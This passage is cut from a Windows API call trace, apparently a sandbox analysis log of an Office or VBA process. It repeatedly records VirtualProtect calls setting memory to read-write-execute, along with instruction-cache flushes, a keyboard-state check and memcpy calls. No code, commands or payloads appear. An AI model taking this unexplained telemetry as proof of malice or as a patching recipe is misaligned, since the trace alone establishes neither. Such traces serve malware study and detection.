lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.320] GetCurrentProcess () returned 0xffffffff [0110.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0110.320] GetCurrentProcess () returned 0xffffffff [0110.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0110.320] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.320] GetCurrentProcess () returned 0xffffffff [0110.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0110.320] GetCurrentProcess () returned 0xffffffff [0110.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0110.320] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.321] GetCurrentProcess () returned 0xffffffff [0110.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0110.321] GetCurrentProcess () returned 0xffffffff [0110.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0110.321] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.322] GetCurrentProcess () returned 0xffffffff [0110.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0110.322] GetCurrentProcess () returned 0xffffffff [0110.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0110.322] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.322] GetCurrentProcess () returned 0xffffffff [0110.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0110.322] GetCurrentProcess () returned 0xffffffff [0110.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0110.322] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.323] GetCurrentProcess () returned 0xffffffff [0110.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0110.323] GetCurrentProcess () returned 0xffffffff [0110.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0110.323] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.323] GetCurrentProcess () returned 0xffffffff [0110.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0110.323] GetCurrentProcess () returned 0xffffffff [0110.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0110.324] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.324] GetCurrentProcess () returned 0xffffffff [0110.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0110.324] GetCurrentProcess () returned 0xffffffff [0110.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0110.324] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.337] GetCurrentProcess () returned 0xffffffff [0110.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0110.337] GetCurrentProcess () returned 0xffffffff [0110.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0110.337] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.338] GetCurrentProcess () returned 0xffffffff [0110.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0110.338] GetCurrentProcess () returned 0xffffffff [0110.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0110.338] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.338] GetCurrentProcess () returned 0xffffffff [0110.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0110.338] GetCurrentProcess () returned 0xffffffff [0110.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0110.338] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.339] GetCurrentProcess () returned 0xffffffff [0110.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0110.339] GetCurrentProcess () returned 0xffffffff [0110.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0110.339] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.339] GetCurrentProcess () returned 0xffffffff [0110.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0110.340] GetCurrentProcess () returned 0xffffffff [0110.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0110.340] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.341] GetCurrentProcess () returned 0xffffffff [0110.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0110.341] GetCurrentProcess () returned 0xffffffff [0110.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0110.341] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.341] GetCurrentProcess () returned 0xffffffff [0110.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0110.341] GetCurrentProcess () returned 0xffffffff [0110.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0110.341] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.342] GetCurrentProcess () returned 0xffffffff [0110.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0110.342] GetCurrentProcess () returned 0xffffffff [0110.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0110.342] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.343] GetCurrentProcess () returned 0xffffffff [0110.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0110.343] GetCurrentProcess () returned 0xffffffff [0110.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0110.343] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0110.343] GetCurrentProcess () returned 0xffffffff [0110.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0110.345] GetAsyncKeyState (vKey=3) returned 0 [0110.345] CRetailMalloc_Alloc () returned 0xcb3de60 [0110.345] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.345] memcpy (in: _Dst=0xd015270, _Src=0x197748, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.345] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.345] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.345] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.345] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.346] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.346] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.346] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.346] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.346] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.346] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.346] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.347] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.347] memcpy (in: _Dst=0xd015168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.347] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.347] CRetailMalloc_Realloc () returned 0xb27fe30 [0110.347] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.347] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.347] memcpy (in: _Dst=0xd015168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.347] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.348] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.348] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.348] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.348] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.348] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.348] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.348] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.348] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.348] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.349] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.349] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.349] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.349] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.349] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.349] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.350] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.350] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.350] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.350] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.350] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.350] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.350] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.350] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.350] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.351] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.351] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.351] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.351] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.351] memcpy (in: _Dst=0xd01516c, _Src=0x197748, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.351] memcpy (in: _Dst=0xd015170, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0110.351] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.351] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.351] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.352] memcpy (in: _Dst=0xd015168, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.352] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.352] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.352] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.352] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.352] memcpy (in: _Dst=0xd01516c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0110.352] memcpy (in: _Dst=0xd015168, _Src=0x197748, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.377] CRetailMalloc_Alloc () returned 0xc90ce40 [0110.377] memcpy (in: _Dst=0xc90ce40, _Src=0x0, _Size=0x0 | out: _Dst=0xc90ce40) returned 0xc90ce40 [0110.377] memcpy (in: _Dst=0xcb3e0fc, _Src=0x1977e4, _Size=0x18 | out: _Dst=0xcb3e0fc) returned 0xcb3e0fc [0110.377] memcpy (in: _Dst=0xcb3e13e, _Src=0xc90ce40, _Size=0x2 | out: _Dst=0xcb3e13e) returned 0xcb3e13e [0110.377] CRetailMalloc_Realloc () returned 0xcb3de60 [0110.377] CRetailMalloc_Free () returned 0x1 [0110.378] CRetailMalloc_Free () returned 0x1 [0110.378] GetCurrentProcess () returned 0xffffffff [0110.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0110.378] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.378] GetCurrentProcess () returned 0xffffffff [0110.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0110.379] GetCurrentProcess () returned 0xffffffff [0110.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0110.379] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.379] GetCurrentProcess () returned 0xffffffff [0110.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0110.379] GetCurrentProcess () returned 0xffffffff [0110.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0110.379] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.380] GetCurrentProcess () returned 0xffffffff [0110.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0110.380] GetCurrentProcess () returned 0xffffffff [0110.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0110.380] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.380] GetCurrentProcess () returned 0xffffffff [0110.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0110.380] GetCurrentProcess () returned 0xffffffff [0110.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0110.381] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.381] GetCurrentProcess () returned 0xffffffff [0110.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0110.381] GetCurrentProcess () returned 0xffffffff [0110.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0110.381] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.382] GetCurrentProcess () returned 0xffffffff [0110.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0110.382] GetCurrentProcess () returned 0xffffffff [0110.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0110.382] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.382] GetCurrentProcess () returned 0xffffffff [0110.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0110.382] GetCurrentProcess () returned 0xffffffff [0110.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0110.383] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.383] GetCurrentProcess () returned 0xffffffff [0110.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0110.383] GetCurrentProcess () returned 0xffffffff [0110.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0110.383] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.384] GetCurrentProcess () returned 0xffffffff [0110.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0110.384] GetCurrentProcess () returned 0xffffffff [0110.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0110.384] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.384] GetCurrentProcess () returned 0xffffffff [0110.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0110.384] GetCurrentProcess () returned 0xffffffff [0110.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0110.384] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.385] GetCurrentProcess () returned 0xffffffff [0110.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0110.385] GetCurrentProcess () returned 0xffffffff [0110.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0110.385] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.386] GetCurrentProcess () returned 0xffffffff [0110.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0110.386] GetCurrentProcess () returned 0xffffffff [0110.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0110.386] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.386] GetCurrentProcess () returned 0xffffffff [0110.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0110.386] GetCurrentProcess () returned 0xffffffff [0110.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0110.386] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.387] GetCurrentProcess () returned 0xffffffff [0110.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0110.387] GetCurrentProcess () returned 0xffffffff [0110.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0110.387] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.388] GetCurrentProcess () returned 0xffffffff [0110.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0110.388] GetCurrentProcess () returned 0xffffffff [0110.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0110.388] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.388] GetCurrentProcess () returned 0xffffffff [0110.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0110.388] GetCurrentProcess () returned 0xffffffff [0110.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0110.388] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.389] GetCurrentProcess () returned 0xffffffff [0110.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0110.389] GetCurrentProcess () returned 0xffffffff [0110.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0110.389] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.390] GetCurrentProcess () returned 0xffffffff [0110.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0110.390] GetCurrentProcess () returned 0xffffffff [0110.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0110.390] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.390] GetCurrentProcess () returned 0xffffffff [0110.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0110.390] GetCurrentProcess () returned 0xffffffff [0110.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0110.390] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.391] GetCurrentProcess () returned 0xffffffff [0110.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0110.391] GetCurrentProcess () returned 0xffffffff [0110.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0110.391] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.392] GetCurrentProcess () returned 0xffffffff [0110.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0110.392] GetCurrentProcess () returned 0xffffffff [0110.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0110.392] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.392] GetCurrentProcess () returned 0xffffffff [0110.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0110.392] GetCurrentProcess () returned 0xffffffff [0110.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0110.392] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.393] GetCurrentProcess () returned 0xffffffff [0110.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0110.393] GetCurrentProcess () returned 0xffffffff [0110.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0110.393] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.394] 